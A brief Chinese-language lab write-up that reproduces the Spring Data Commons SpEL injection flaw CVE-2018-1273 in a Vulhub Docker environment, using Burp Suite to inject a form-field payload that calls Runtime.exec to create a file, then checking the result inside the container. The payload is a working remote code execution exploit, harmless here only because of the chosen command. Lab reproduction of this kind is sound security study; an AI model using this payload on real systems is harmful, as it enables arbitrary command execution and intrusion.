前期准备
工具:burpsuite、firefox浏览器
环境:kali
一、漏洞复现
(1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users
,在注册页面提交任意信息,用burp抓包;
找到我们提交的数据,之后发送到repeater进行修改数据包;
构造payload,username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=
,修改数据包,创建文件,进行发包测试;
Send之后,返回以下页面时,证实攻击成功;
进入容器查看文件夹是否创建成功(文件创建成功~):进入Ubuntu环境中,执行docker-compose exec spring bash
,进入目录,查看tmp下的目录成功出现2333文件,命令执行成功。
执行 exit
退出当前用户的命令行环境
关闭docker环境,docker-compose down
二、总结
用火狐浏览器设置代理,用burp抓包时,一直没能连接到burp,之后发现和靶场端口撞了,之后修改的burp的端口,在启动代理时就能抓包了。